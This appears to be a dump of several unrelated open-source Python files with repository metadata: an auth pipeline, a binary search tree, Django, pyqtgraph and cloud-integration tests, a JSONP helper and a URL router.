] | 10 | 2019-04-24T14:33:49.000Z | 2020-12-19T01:07:06.000Z | src/unicef_security/pipeline.py | unicef/unicef-security | cc51ba52cddb845b8174cf3dc94706f0334453b2 | [
"Apache-2.0"
] | 1 | 2019-04-11T15:34:18.000Z | 2019-04-11T15:34:18.000Z | from social_core.pipeline import social_auth
from social_core.pipeline.user import USER_FIELDS
from .config import UNICEF_EMAIL
def social_details(backend, details, response, *args, **kwargs):
r = social_auth.social_details(backend, details, response, *args, **kwargs)
r['details']['idp'] = response.get('idp')
if not r['details'].get('email'):
if not response.get('email'):
r['details']['email'] = response["signInNames.emailAddress"]
else:
r['details']['email'] = response.get('email')
email = r['details'].get('email')
if isinstance(email, str):
r['details']['email'] = email.lower()
return r
def get_username(strategy, details, backend, user=None, *args, **kwargs):
return {'username': details.get('email')}
def create_unicef_user(strategy, details, backend, user=None, *args, **kwargs):
"""Overrides create_user, to create only UNICEF users"""
if user:
return {'is_new': False}
fields = dict((name, kwargs.get(name, details.get(name)))
for name in backend.setting('USER_FIELDS', USER_FIELDS))
if not (fields and details.get('email', '').endswith(UNICEF_EMAIL)):
return
return {
'is_new': True,
'user': strategy.create_user(**fields)
}
| 33.307692 | 79 | 0.639723 |
acf6a9fe3cc450334faa6ef4eb8ad10d675cc988 | 2,712 | py | Python | Lab2_ALG/src/BinarySearchTree.py | DanialAroff/WIA2005---Lab | d8eb035cab07c0d7962ca3ca0e70407c116c0caf | [
"Apache-2.0"
] | null | null | null | Lab2_ALG/src/BinarySearchTree.py | DanialAroff/WIA2005---Lab | d8eb035cab07c0d7962ca3ca0e70407c116c0caf | [
"Apache-2.0"
] | null | null | null | Lab2_ALG/src/BinarySearchTree.py | DanialAroff/WIA2005---Lab | d8eb035cab07c0d7962ca3ca0e70407c116c0caf | [
"Apache-2.0"
] | 1 | 2020-04-14T10:48:00.000Z | 2020-04-14T10:48:00.000Z | class TreeNode:
def __init__(self, data=None):
self.data = data
self.right = None
self.left = None
class BST:
def __init__(self):
self.root = None
def get_root(self):
return self.root
def insert(self, data):
parent = None
if self.root is None:
self.root = TreeNode(data)
else:
current = self.root
while current is not None:
if data < current.data:
parent = current
current = current.left
elif data > current.data:
parent = current
current = current.right
if data < parent.data:
parent.left = TreeNode(data)
elif data > parent.data:
parent.right = TreeNode(data)
def search(self, data):
current = self.root
while current is not None:
if data < current.data:
current = current.left
elif data > current.data:
current = current.right
else:
return True
return False
def min_value_node(self):
"""To find the node with minimum value within a tree"""
current = self.root
while current.left is not None:
current = current.left
return current.data
def delete(self, data):
parent = current = self.root
while current is not None:
if data < current.data:
parent = current
current = current.left
elif data > current.data:
parent = current
current = current.right
else:
# if node does not have a left child
if current.left is None:
parent.left = current.right
break
# if node has left child
elif current.left is not None:
temp = current.left
while temp.right is not None:
parent_temp = temp
temp = temp.right
current.data = temp.data
# connect the parent of rightmost node to
# the left child of rightmost node
parent_temp.right = temp.left
def inorder(self):
"""a function which mainly calls the inorderRec function"""
self.inorderRec(self.root)
def inorderRec(self, root):
"""print the content with in-order traversal"""
if root:
self.inorderRec(root.left)
print(root.data)
self.inorderRec(root.right)
| 30.818182 | 67 | 0.498894 |
acf6aacf646cf025944985b8e1371d95b794592d | 841 | py | Python | tests/test_wabs_worker.py | paalkr/wal-e | ff6102a1d19cf0f683c7232f618dbe8d14e6e017 | [
"BSD-3-Clause"
] | 2,739 | 2015-01-05T03:57:02.000Z | 2022-03-22T10:51:38.000Z | tests/test_wabs_worker.py | 0xgpapad/wal-e | f5b3e790fe10daa098b8cbf01d836c4885dc13c7 | [
"BSD-3-Clause"
] | 264 | 2015-01-13T01:07:19.000Z | 2022-02-08T00:56:14.000Z | tests/test_wabs_worker.py | 0xgpapad/wal-e | f5b3e790fe10daa098b8cbf01d836c4885dc13c7 | [
"BSD-3-Clause"
] | 245 | 2015-01-11T15:13:42.000Z | 2022-02-10T10:58:09.000Z | import pytest
from wal_e.worker.wabs import BackupList
from wal_e import storage
from wabs_integration_help import (
FreshContainer,
no_real_wabs_credentials,
)
# Contrivance to quiet down pyflakes, since pytest does some
# string-evaluation magic in test collection.
no_real_wabs_credentials = no_real_wabs_credentials
@pytest.mark.skipif("no_real_wabs_credentials()")
def test_empty_latest_listing():
    """A 'backup-list LATEST' against an empty prefix must yield nothing."""
    container = 'wal-e-test-empty-listing'
    prefix = 'wabs://{0}/test-prefix'.format(container)
    layout = storage.StorageLayout(prefix)
    with FreshContainer(container) as fresh:
        fresh.create()
        backups = BackupList(fresh.conn, layout, False)
        assert list(backups.find_all('LATEST')) == []
| 30.035714 | 65 | 0.702735 |
acf6ac2c24149a35c409a7e0c2c0e141ea8861a3 | 800 | py | Python | ckan/lib/jsonp.py | florianm/ckan | 1cfd98d591ac70b4eb81048bcd227b6c1354b1bf | [
"Apache-2.0"
] | 12 | 2015-08-28T16:59:07.000Z | 2020-03-08T01:39:30.000Z | ckan/lib/jsonp.py | florianm/ckan | 1cfd98d591ac70b4eb81048bcd227b6c1354b1bf | [
"Apache-2.0"
] | 13 | 2019-05-02T21:01:28.000Z | 2020-10-20T23:34:48.000Z | ckan/lib/jsonp.py | florianm/ckan | 1cfd98d591ac70b4eb81048bcd227b6c1354b1bf | [
"Apache-2.0"
] | 10 | 2015-05-08T04:33:20.000Z | 2020-03-03T15:17:58.000Z | import decorator
from ckan.common import json, request, response
def to_jsonp(data):
    """Serialize ``data`` as JSON, or as JSONP when the request carries a
    ``callback`` parameter; sets the response Content-Type either way."""
    body = json.dumps(data, sort_keys=True)
    response.headers['Content-Type'] = 'application/json;charset=utf-8'
    callback = request.params.get('callback')
    if callback is not None:
        # Wrap the JSON payload in the caller-supplied callback invocation.
        body = '%s(%s);' % (callback, body)
    return body
def jsonpify(func, *args, **kwargs):
    """Decorator body: call ``func`` and render its result as JSON, or as
    JSONP when the HTTP request specifies a *callback* parameter.
    Modelled after pylons.decorators.jsonify.
    """
    return to_jsonp(func(*args, **kwargs))
| 27.586207 | 70 | 0.6725 |
acf6ad0c359a37418c4fb83d399f3f4d95a9d22d | 155 | py | Python | ppython/lab.py | ovolkovskyics/ppython | edad2f90638aa47557e3b75358dc0bd657134a00 | [
"Apache-2.0"
] | 47 | 2019-08-15T05:49:34.000Z | 2022-01-19T06:32:11.000Z | ppython/lab.py | ovolkovskyics/ppython | edad2f90638aa47557e3b75358dc0bd657134a00 | [
"Apache-2.0"
] | 32 | 2019-08-15T20:00:42.000Z | 2022-02-28T17:26:26.000Z | ppython/lab.py | ovolkovskyics/ppython | edad2f90638aa47557e3b75358dc0bd657134a00 | [
"Apache-2.0"
] | 65 | 2019-08-15T14:08:16.000Z | 2022-02-19T13:59:42.000Z | def setup():
print(dist(0, 0, 0, 100))
def draw():
    """Per-frame draw loop (Processing-mode sketch).

    NOTE(review): ``noStroke``/``fill``/``random``/``ellipse`` are
    Processing built-ins injected at runtime — presumably this file runs
    under the p5/Processing Python mode; confirm before importing directly.
    """
    #background(100)
    noStroke()
    fill(random(255))
    ellipse(10, 10, 100, random(50, 100)) | 19.375 | 41 | 0.574194 |
acf6ad721491aeb9cbbafa498f1efe43ed03991f | 2,744 | py | Python | acq4/pyqtgraph/graphicsItems/tests/test_ScatterPlotItem.py | travis-open/acq4 | 2b3a2a6aa7616f6b65d09c3d01cb73e1a07b1088 | [
"MIT"
] | 23 | 2017-09-04T13:20:38.000Z | 2022-03-08T08:15:17.000Z | acq4/pyqtgraph/graphicsItems/tests/test_ScatterPlotItem.py | travis-open/acq4 | 2b3a2a6aa7616f6b65d09c3d01cb73e1a07b1088 | [
"MIT"
] | 4 | 2018-01-05T13:44:29.000Z | 2021-09-30T17:08:15.000Z | acq4/pyqtgraph/graphicsItems/tests/test_ScatterPlotItem.py | travis-open/acq4 | 2b3a2a6aa7616f6b65d09c3d01cb73e1a07b1088 | [
"MIT"
] | 5 | 2017-11-26T19:40:46.000Z | 2021-03-11T17:25:23.000Z | import pyqtgraph as pg
import numpy as np
app = pg.mkQApp()
app.processEvents()
def test_scatterplotitem():
    """Exercise every spot-update code path (scalar, list, ndarray and
    per-spot setters) for all four pxMode/useCache combinations."""
    plot = pg.PlotWidget()
    # set view range equal to its bounding rect.
    # This causes plots to look the same regardless of pxMode.
    plot.setRange(rect=plot.boundingRect())
    for i, pxMode in enumerate([True, False]):
        for j, useCache in enumerate([True, False]):
            s = pg.ScatterPlotItem()
            s.opts['useCache'] = useCache
            plot.addItem(s)
            # Offset each combination so the point sets do not overlap.
            s.setData(x=np.array([10,40,20,30])+i*100, y=np.array([40,60,10,30])+j*100, pxMode=pxMode)
            s.addPoints(x=np.array([60, 70])+i*100, y=np.array([60, 70])+j*100, size=[20, 30])
            # Test uniform spot updates
            s.setSize(10)
            s.setBrush('r')
            s.setPen('g')
            s.setSymbol('+')
            app.processEvents()
            # Test list spot updates
            s.setSize([10] * 6)
            s.setBrush([pg.mkBrush('r')] * 6)
            s.setPen([pg.mkPen('g')] * 6)
            s.setSymbol(['+'] * 6)
            s.setPointData([s] * 6)
            app.processEvents()
            # Test array spot updates
            s.setSize(np.array([10] * 6))
            s.setBrush(np.array([pg.mkBrush('r')] * 6))
            s.setPen(np.array([pg.mkPen('g')] * 6))
            s.setSymbol(np.array(['+'] * 6))
            s.setPointData(np.array([s] * 6))
            app.processEvents()
            # Test per-spot updates
            spot = s.points()[0]
            spot.setSize(20)
            spot.setBrush('b')
            spot.setPen('g')
            spot.setSymbol('o')
            spot.setData(None)
            app.processEvents()
            plot.clear()
def test_init_spots():
    """Constructing a ScatterPlotItem from spot dicts must honor per-spot opts."""
    plot = pg.PlotWidget()
    # Match the view range to the bounding rect so pxMode has no visual effect.
    plot.setRange(rect=plot.boundingRect())
    spec = [
        {'x': 0, 'y': 1},
        {'pos': (1, 2), 'pen': None, 'brush': None, 'data': 'zzz'},
    ]
    item = pg.ScatterPlotItem(spots=spec)
    # Displaying the item must not raise.
    plot.addItem(item)
    app.processEvents()
    plot.clear()
    # The stored spot data must round-trip.
    first, second = item.points()[0], item.points()[1]
    defPen = pg.mkPen(pg.getConfigOption('foreground'))
    assert (first.pos().x(), first.pos().y()) == (0, 1)
    assert first.pen() == defPen
    assert first.data() is None
    assert (second.pos().x(), second.pos().y()) == (1, 2)
    assert second.pen() == pg.mkPen(None)
    assert second.brush() == pg.mkBrush(None)
    assert second.data() == 'zzz'
if __name__ == '__main__':
test_scatterplotitem()
| 30.153846 | 102 | 0.530612 |
acf6ad838dd28a16aa3babab0f0a9eb0dfdd8010 | 7,593 | py | Python | blog/tests.py | DingNing123/DjangoBlog | 7b073d01a86bfdf3bcdfe58cdf768b5a961b56ea | [
"MIT"
] | null | null | null | blog/tests.py | DingNing123/DjangoBlog | 7b073d01a86bfdf3bcdfe58cdf768b5a961b56ea | [
"MIT"
] | null | null | null | blog/tests.py | DingNing123/DjangoBlog | 7b073d01a86bfdf3bcdfe58cdf768b5a961b56ea | [
"MIT"
] | null | null | null | import os
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.management import call_command
from django.core.paginator import Paginator
from django.test import Client, RequestFactory, TestCase
from django.urls import reverse
from django.utils import timezone
from DjangoBlog.utils import get_current_site, get_sha256
from accounts.models import BlogUser
from blog.forms import BlogSearchForm
from blog.models import Article, Category, Tag, SideBar, Links
from blog.templatetags.blog_tags import load_pagination_info, load_articletags
# Create your tests here.
class ArticleTest(TestCase):
def setUp(self):
self.client = Client()
self.factory = RequestFactory()
    def test_validate_article(self):
        """End-to-end smoke test: create an admin user, sidebar, category,
        tag and 21 articles, then hit the public pages, search, feeds,
        sitemap and pagination helpers, expecting HTTP 200 everywhere."""
        site = get_current_site().domain  # NOTE(review): value unused — kept for the lookup side effect; confirm
        user = BlogUser.objects.get_or_create(
            email="liangliangyy@gmail.com",
            username="liangliangyy")[0]
        user.set_password("liangliangyy")
        user.is_staff = True
        user.is_superuser = True
        user.save()
        response = self.client.get(user.get_absolute_url())
        self.assertEqual(response.status_code, 200)
        # Admin pages fetched without asserting on the status.
        response = self.client.get('/admin/servermanager/emailsendlog/')
        response = self.client.get('admin/admin/logentry/')
        s = SideBar()
        s.sequence = 1
        s.name = 'test'
        s.content = 'test content'
        s.is_enable = True
        s.save()
        category = Category()
        category.name = "category"
        category.created_time = timezone.now()
        category.last_mod_time = timezone.now()
        category.save()
        tag = Tag()
        tag.name = "nicetag"
        tag.save()
        article = Article()
        article.title = "nicetitle"
        article.body = "nicecontent"
        article.author = user
        article.category = category
        article.type = 'a'
        article.status = 'p'
        article.save()
        self.assertEqual(0, article.tags.count())
        article.tags.add(tag)
        article.save()
        self.assertEqual(1, article.tags.count())
        # Bulk content so the pagination checks below have several pages.
        for i in range(20):
            article = Article()
            article.title = "nicetitle" + str(i)
            article.body = "nicetitle" + str(i)
            article.author = user
            article.category = category
            article.type = 'a'
            article.status = 'p'
            article.save()
            article.tags.add(tag)
            article.save()
        from blog.documents import ELASTICSEARCH_ENABLED
        if ELASTICSEARCH_ENABLED:
            call_command("build_index")
            response = self.client.get('/search', {'q': 'nicetitle'})
            self.assertEqual(response.status_code, 200)
        response = self.client.get(article.get_absolute_url())
        self.assertEqual(response.status_code, 200)
        from DjangoBlog.spider_notify import SpiderNotify
        SpiderNotify.notify(article.get_absolute_url())
        response = self.client.get(tag.get_absolute_url())
        self.assertEqual(response.status_code, 200)
        response = self.client.get(category.get_absolute_url())
        self.assertEqual(response.status_code, 200)
        response = self.client.get('/search', {'q': 'django'})
        self.assertEqual(response.status_code, 200)
        s = load_articletags(article)
        self.assertIsNotNone(s)
        # /refresh redirects anonymous users and succeeds once logged in.
        rsp = self.client.get('/refresh')
        self.assertEqual(rsp.status_code, 302)
        self.client.login(username='liangliangyy', password='liangliangyy')
        rsp = self.client.get('/refresh')
        self.assertEqual(rsp.status_code, 200)
        response = self.client.get(reverse('blog:archives'))
        self.assertEqual(response.status_code, 200)
        p = Paginator(Article.objects.all(), 2)
        self.__check_pagination__(p, '', '')
        p = Paginator(Article.objects.filter(tags=tag), 2)
        self.__check_pagination__(p, '分类标签归档', tag.slug)
        p = Paginator(
            Article.objects.filter(
                author__username='liangliangyy'), 2)
        self.__check_pagination__(p, '作者文章归档', 'liangliangyy')
        p = Paginator(Article.objects.filter(category=category), 2)
        self.__check_pagination__(p, '分类目录归档', category.slug)
        f = BlogSearchForm()
        f.search()
        # self.client.login(username='liangliangyy', password='liangliangyy')
        from DjangoBlog.spider_notify import SpiderNotify
        SpiderNotify.baidu_notify([article.get_full_url()])
        from blog.templatetags.blog_tags import gravatar_url, gravatar
        u = gravatar_url('liangliangyy@gmail.com')
        u = gravatar('liangliangyy@gmail.com')
        link = Links(
            sequence=1,
            name="lylinux",
            link='https://wwww.lylinux.net')
        link.save()
        response = self.client.get('/links.html')
        self.assertEqual(response.status_code, 200)
        rsp = self.client.get('/refresh')
        self.assertEqual(rsp.status_code, 200)
        response = self.client.get('/feed/')
        self.assertEqual(response.status_code, 200)
        response = self.client.get('/sitemap.xml')
        self.assertEqual(response.status_code, 200)
        self.client.get("/admin/blog/article/1/delete/")
        self.client.get('/admin/servermanager/emailsendlog/')
        self.client.get('admin/admin/logentry/')
def __check_pagination__(self, p, type, value):
s = load_pagination_info(p.page(1), type, value)
self.assertIsNotNone(s)
response = self.client.get(s['previous_url'])
self.assertEqual(response.status_code, 200)
response = self.client.get(s['next_url'])
self.assertEqual(response.status_code, 200)
s = load_pagination_info(p.page(2), type, value)
self.assertIsNotNone(s)
response = self.client.get(s['previous_url'])
self.assertEqual(response.status_code, 200)
response = self.client.get(s['next_url'])
self.assertEqual(response.status_code, 200)
    def test_image(self):
        """Round-trip the signed /upload endpoint with a real PNG.

        NOTE(review): downloads the fixture image from python.org at test
        time, so this test is network-dependent and flaky offline —
        consider vendoring the image instead.
        """
        import requests
        rsp = requests.get(
            'https://www.python.org/static/img/python-logo@2x.png')
        imagepath = os.path.join(settings.BASE_DIR, 'python.png')
        with open(imagepath, 'wb') as file:
            file.write(rsp.content)
        # An unsigned upload must be rejected.
        rsp = self.client.post('/upload')
        self.assertEqual(rsp.status_code, 403)
        sign = get_sha256(get_sha256(settings.SECRET_KEY))
        with open(imagepath, 'rb') as file:
            imgfile = SimpleUploadedFile(
                'python.png', file.read(), content_type='image/jpg')
            form_data = {'python.png': imgfile}
            rsp = self.client.post(
                '/upload?sign=' + sign, form_data, follow=True)
            self.assertEqual(rsp.status_code, 200)
        os.remove(imagepath)
        from DjangoBlog.utils import save_user_avatar, send_email
        send_email(['qq@qq.com'], 'testTitle', 'testContent')
        save_user_avatar(
            'https://www.python.org/static/img/python-logo@2x.png')
def test_errorpage(self):
rsp = self.client.get('/eee')
self.assertEqual(rsp.status_code, 404)
def test_commands(self):
from blog.documents import ELASTICSEARCH_ENABLED
if ELASTICSEARCH_ENABLED:
call_command("build_index")
call_command("ping_baidu", "all")
call_command("create_testdata")
call_command("clear_cache")
call_command("sync_user_avatar")
call_command("build_search_words")
| 36.681159 | 78 | 0.635981 |
acf6ae355a6159d04d31e65dd5efe08c515e8170 | 825 | py | Python | tests/test_router.py | vinicius0026/falcon-routing-tools | e4f00ec5cfb87d7c7e9aec355e19f010c2b702f3 | [
"MIT"
] | null | null | null | tests/test_router.py | vinicius0026/falcon-routing-tools | e4f00ec5cfb87d7c7e9aec355e19f010c2b702f3 | [
"MIT"
] | null | null | null | tests/test_router.py | vinicius0026/falcon-routing-tools | e4f00ec5cfb87d7c7e9aec355e19f010c2b702f3 | [
"MIT"
] | null | null | null | import sys
import os
sys.path.append('../')
sys.path.append('./')
from falcon_routing_tools import Router
def test_router_resource_decorator():
    """@router.resource must register the decorated class exactly once."""
    router = Router()
    @router.resource('/some-path')
    class SomeResource():
        pass
    registered = router.resources
    assert len(registered) == 1
    entry = registered[0]
    assert entry.path == '/some-path'
    assert entry.resource.__name__ == 'SomeResource'
def test_controller_loading():
    """load_controllers must discover every resource under the fixtures dir."""
    from fixtures.router import router
    base_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'fixtures')
    router.load_controllers(base_dir)
    assert len(router.resources) == 3
    expected_paths = set(['/resource-a', '/resource-a/{id}', '/resource-b'])
    actual_paths = set([route.path for route in router.resources])
    # NOTE(review): the trailing "| 27.5 | ..." tokens on the next line look
    # like dataset-export corruption fused onto the final statement — the
    # original source presumably ends at the comparison; confirm upstream.
    assert expected_paths == actual_paths | 27.5 | 84 | 0.695758 |
acf6af62d05ec2c2fdb7701f824eac7d4ac4c73e | 7,463 | py | Python | tests/components/cloud/test_client.py | pcaston/Open-Peer-Power | 81805d455c548e0f86b0f7fedc793b588b2afdfd | [
"Apache-2.0"
] | null | null | null | tests/components/cloud/test_client.py | pcaston/Open-Peer-Power | 81805d455c548e0f86b0f7fedc793b588b2afdfd | [
"Apache-2.0"
] | null | null | null | tests/components/cloud/test_client.py | pcaston/Open-Peer-Power | 81805d455c548e0f86b0f7fedc793b588b2afdfd | [
"Apache-2.0"
] | null | null | null | """Test the cloud.iot module."""
from unittest.mock import MagicMock, patch
from aiohttp import web
import pytest
from openpeerpower.components.cloud import DOMAIN
from openpeerpower.components.cloud.client import CloudClient
from openpeerpower.components.cloud.const import PREF_ENABLE_ALEXA, PREF_ENABLE_GOOGLE
from openpeerpower.core import State
from openpeerpower.setup import async_setup_component
from . import mock_cloud, mock_cloud_prefs
from tests.common import mock_coro
from tests.components.alexa import test_smart_home as test_alexa
@pytest.fixture
def mock_cloud_inst():
    """Fixture: a MagicMock cloud whose subscription has not expired."""
    cloud = MagicMock(subscription_expired=False)
    return cloud
async def test_handler_alexa(opp):
    """Alexa discovery must return only the non-excluded entity, with the
    per-entity config (name/description/category) applied."""
    # Two switches; switch.test2 is excluded by the filter below.
    opp.states.async_set("switch.test", "on", {"friendly_name": "Test switch"})
    opp.states.async_set("switch.test2", "on", {"friendly_name": "Test switch 2"})
    await mock_cloud(
        opp,
        {
            "alexa": {
                "filter": {"exclude_entities": "switch.test2"},
                "entity_config": {
                    "switch.test": {
                        "name": "Config name",
                        "description": "Config description",
                        "display_categories": "LIGHT",
                    }
                },
            }
        },
    )
    mock_cloud_prefs(opp)
    cloud = opp.data["cloud"]
    resp = await cloud.client.async_alexa_message(
        test_alexa.get_new_request("Alexa.Discovery", "Discover")
    )
    endpoints = resp["event"]["payload"]["endpoints"]
    # Only the included switch survives discovery.
    assert len(endpoints) == 1
    device = endpoints[0]
    assert device["description"] == "Config description via Open Peer Power"
    assert device["friendlyName"] == "Config name"
    assert device["displayCategories"] == ["LIGHT"]
    assert device["manufacturerName"] == "Open Peer Power"
async def test_handler_alexa_disabled(opp, mock_cloud_fixture):
    """Alexa requests must fail with BRIDGE_UNREACHABLE once Alexa is disabled."""
    mock_cloud_fixture._prefs[PREF_ENABLE_ALEXA] = False
    discovery = test_alexa.get_new_request("Alexa.Discovery", "Discover")
    resp = await opp.data["cloud"].client.async_alexa_message(discovery)
    header = resp["event"]["header"]
    assert header["namespace"] == "Alexa"
    assert header["name"] == "ErrorResponse"
    assert resp["event"]["payload"]["type"] == "BRIDGE_UNREACHABLE"
async def test_handler_google_actions(opp):
    """Google SYNC must expose only the included switch, with its config
    (name/aliases/room) applied and the agentUserId taken from the token."""
    opp.states.async_set("switch.test", "on", {"friendly_name": "Test switch"})
    opp.states.async_set("switch.test2", "on", {"friendly_name": "Test switch 2"})
    # Group entity; excluded from the response along with switch.test2.
    opp.states.async_set("group.all_locks", "on", {"friendly_name": "Evil locks"})
    await mock_cloud(
        opp,
        {
            "google_actions": {
                "filter": {"exclude_entities": "switch.test2"},
                "entity_config": {
                    "switch.test": {
                        "name": "Config name",
                        "aliases": "Config alias",
                        "room": "living room",
                    }
                },
            }
        },
    )
    mock_cloud_prefs(opp)
    cloud = opp.data["cloud"]
    reqid = "5711642932632160983"
    data = {"requestId": reqid, "inputs": [{"intent": "action.devices.SYNC"}]}
    # Fake the JWT claims so agentUserId resolves without a real login.
    with patch(
        "opp_nabucasa.Cloud._decode_claims",
        return_value={"cognito:username": "myUserName"},
    ):
        await cloud.client.get_google_config()
        resp = await cloud.client.async_google_message(data)
    assert resp["requestId"] == reqid
    payload = resp["payload"]
    assert payload["agentUserId"] == "myUserName"
    devices = payload["devices"]
    assert len(devices) == 1
    device = devices[0]
    assert device["id"] == "switch.test"
    assert device["name"]["name"] == "Config name"
    assert device["name"]["nicknames"] == ["Config name", "Config alias"]
    assert device["type"] == "action.devices.types.SWITCH"
    assert device["roomHint"] == "living room"
async def test_handler_google_actions_disabled(opp, mock_cloud_fixture):
    """Google requests must fail with deviceTurnedOff once Google is disabled."""
    mock_cloud_fixture._prefs[PREF_ENABLE_GOOGLE] = False
    with patch("opp_nabucasa.Cloud.start", return_value=mock_coro()):
        assert await async_setup_component(opp, "cloud", {})
    reqid = "5711642932632160983"
    payload = {"requestId": reqid, "inputs": [{"intent": "action.devices.SYNC"}]}
    resp = await opp.data["cloud"].client.async_google_message(payload)
    assert resp["requestId"] == reqid
    assert resp["payload"]["errorCode"] == "deviceTurnedOff"
async def test_webhook_msg(opp):
    """A cloudhook message must be routed to the locally registered webhook
    handler and its JSON response forwarded back."""
    with patch("opp_nabucasa.Cloud.start", return_value=mock_coro()):
        setup = await async_setup_component(opp, "cloud", {"cloud": {}})
        assert setup
    cloud = opp.data["cloud"]
    await cloud.client.prefs.async_initialize()
    # Map the cloudhook id onto a local webhook id.
    await cloud.client.prefs.async_update(
        cloudhooks={
            "hello": {"webhook_id": "mock-webhook-id", "cloudhook_id": "mock-cloud-id"}
        }
    )
    received = []
    async def handler(opp, webhook_id, request):
        """Handle a webhook."""
        received.append(request)
        return web.json_response({"from": "handler"})
    opp.components.webhook.async_register("test", "Test", "mock-webhook-id", handler)
    response = await cloud.client.async_webhook_message(
        {
            "cloudhook_id": "mock-cloud-id",
            "body": '{"hello": "world"}',
            "headers": {"content-type": "application/json"},
            "method": "POST",
            "query": None,
        }
    )
    # The handler's JSON response is relayed verbatim.
    assert response == {
        "status": 200,
        "body": '{"from": "handler"}',
        "headers": {"Content-Type": "application/json"},
    }
    assert len(received) == 1
    assert await received[0].json() == {"hello": "world"}
async def test_google_config_expose_entity(opp, mock_cloud_setup, mock_cloud_login):
    """Toggling per-entity exposure must be reflected by the live Google config."""
    client = opp.data[DOMAIN].client
    gconf = await client.get_google_config()
    kitchen = State("light.kitchen", "on")
    assert gconf.should_expose(kitchen)
    await client.prefs.async_update_google_entity_config(
        entity_id="light.kitchen", should_expose=False
    )
    assert not gconf.should_expose(kitchen)
async def test_google_config_should_2fa(opp, mock_cloud_setup, mock_cloud_login):
    """Disabling 2FA per entity must be reflected by the live Google config."""
    client = opp.data[DOMAIN].client
    gconf = await client.get_google_config()
    kitchen = State("light.kitchen", "on")
    assert gconf.should_2fa(kitchen)
    await client.prefs.async_update_google_entity_config(
        entity_id="light.kitchen", disable_2fa=True
    )
    assert not gconf.should_2fa(kitchen)
async def test_set_username(opp):
    """Logging in must copy the cloud username into the preferences store."""
    prefs = MagicMock(
        alexa_enabled=False,
        google_enabled=False,
        async_set_username=MagicMock(return_value=mock_coro()),
    )
    client = CloudClient(opp, prefs, None, {}, {})
    client.cloud = MagicMock(is_logged_in=True, username="mock-username")
    await client.logged_in()
    calls = prefs.async_set_username.mock_calls
    assert len(calls) == 1
    assert calls[0][1][0] == "mock-username"
| 32.168103 | 87 | 0.636875 |
acf6afc21fa8a7df70653a6b552009f86b2878a2 | 543 | py | Python | core/notification/__init__.py | gahoo/SNAP | 6595a8ab781830e557c75ebd1612c59fdc96114d | [
"MIT"
] | 1 | 2020-01-06T12:07:47.000Z | 2020-01-06T12:07:47.000Z | core/notification/__init__.py | gahoo/SNAP | 6595a8ab781830e557c75ebd1612c59fdc96114d | [
"MIT"
] | null | null | null | core/notification/__init__.py | gahoo/SNAP | 6595a8ab781830e557c75ebd1612c59fdc96114d | [
"MIT"
] | null | null | null | import yaml
import os
import pdb
from ..colorMessage import dyeFAIL
def loadDingTalkConfig():
    """Read the DingTalk robot settings from ~/.snap/dingtalk.conf.

    Creates the ~/.snap directory on first use.  Raises IOError when the
    config file does not exist yet -- the module-level caller relies on
    that to disable the notifier.
    """
    ding_conf_path = os.path.expanduser("~/.snap/")
    if not os.path.exists(ding_conf_path):
        os.mkdir(ding_conf_path)
    ding_conf_file = os.path.expanduser("~/.snap/dingtalk.conf")
    with open(ding_conf_file, 'r') as yaml_file:
        # safe_load: the config file must not be able to construct
        # arbitrary Python objects (yaml.load without a Loader is
        # unsafe and deprecated).
        return yaml.safe_load(yaml_file)
try:
DINGTALK_CONF = loadDingTalkConfig()
except IOError, e:
print dyeFAIL(str(e))
print "dingtalk robot access_token is missing."
DINGTALK_CONF = None
| 27.15 | 65 | 0.710866 |
acf6afc91bea433533174e6a7e7b85f0a14aa292 | 3,435 | py | Python | apistar/server/router.py | TheCulliganMan/apistarserver | faaf9f6fddc97e9bd97a2ea785d041bbaac91ad5 | [
"BSD-3-Clause"
] | 1 | 2018-09-27T14:50:47.000Z | 2018-09-27T14:50:47.000Z | apistar/server/router.py | TheCulliganMan/apistar | faaf9f6fddc97e9bd97a2ea785d041bbaac91ad5 | [
"BSD-3-Clause"
] | null | null | null | apistar/server/router.py | TheCulliganMan/apistar | faaf9f6fddc97e9bd97a2ea785d041bbaac91ad5 | [
"BSD-3-Clause"
] | null | null | null | import inspect
import re
from urllib.parse import urlparse
import werkzeug
from werkzeug.routing import Map, Rule
from apistar import exceptions
from apistar.compat import dict_type
from apistar.server.core import Include, Route
class BaseRouter:
def lookup(self, path: str, method: str):
raise NotImplementedError()
def reverse_url(self, name: str, **params) -> str:
raise NotImplementedError()
class Router(BaseRouter):
def __init__(self, routes):
rules = []
name_lookups = {}
for path, name, route in self.walk_routes(routes):
path_params = [item.strip("{}") for item in re.findall("{[^}]*}", path)]
args = inspect.signature(route.handler).parameters
for path_param in path_params:
if path_param.startswith("+"):
path = path.replace(
"{%s}" % path_param, "<path:%s>" % path_param.lstrip("+")
)
elif path_param in args and args[path_param].annotation is int:
path = path.replace("{%s}" % path_param, "<int:%s>" % path_param)
elif path_param in args and args[path_param].annotation is float:
path = path.replace("{%s}" % path_param, "<float:%s>" % path_param)
else:
path = path.replace("{%s}" % path_param, "<string:%s>" % path_param)
rule = Rule(path, methods=[route.method], endpoint=name)
rules.append(rule)
name_lookups[name] = route
self.adapter = Map(rules).bind("")
self.name_lookups = name_lookups
# Use an MRU cache for router lookups.
self._lookup_cache = dict_type()
self._lookup_cache_size = 10000
def walk_routes(self, routes, url_prefix="", name_prefix=""):
walked = []
for item in routes:
if isinstance(item, Route):
result = (url_prefix + item.url, name_prefix + item.name, item)
walked.append(result)
elif isinstance(item, Include):
result = self.walk_routes(
item.routes, url_prefix + item.url, name_prefix + item.name + ":"
)
walked.extend(result)
return walked
def lookup(self, path: str, method: str):
lookup_key = method + " " + path
try:
return self._lookup_cache[lookup_key]
except KeyError:
pass
try:
name, path_params = self.adapter.match(path, method)
except werkzeug.exceptions.NotFound:
raise exceptions.NotFound() from None
except werkzeug.exceptions.MethodNotAllowed:
raise exceptions.MethodNotAllowed() from None
except werkzeug.routing.RequestRedirect as exc:
path = urlparse(exc.new_url).path
raise exceptions.Found(path) from None
route = self.name_lookups[name]
self._lookup_cache[lookup_key] = (route, path_params)
if len(self._lookup_cache) > self._lookup_cache_size:
self._lookup_cache.pop(next(iter(self._lookup_cache)))
return (route, path_params)
def reverse_url(self, name: str, **params) -> str:
try:
return self.adapter.build(name, params)
except werkzeug.routing.BuildError as exc:
raise exceptions.NoReverseMatch(str(exc)) from None
| 36.157895 | 88 | 0.591266 |
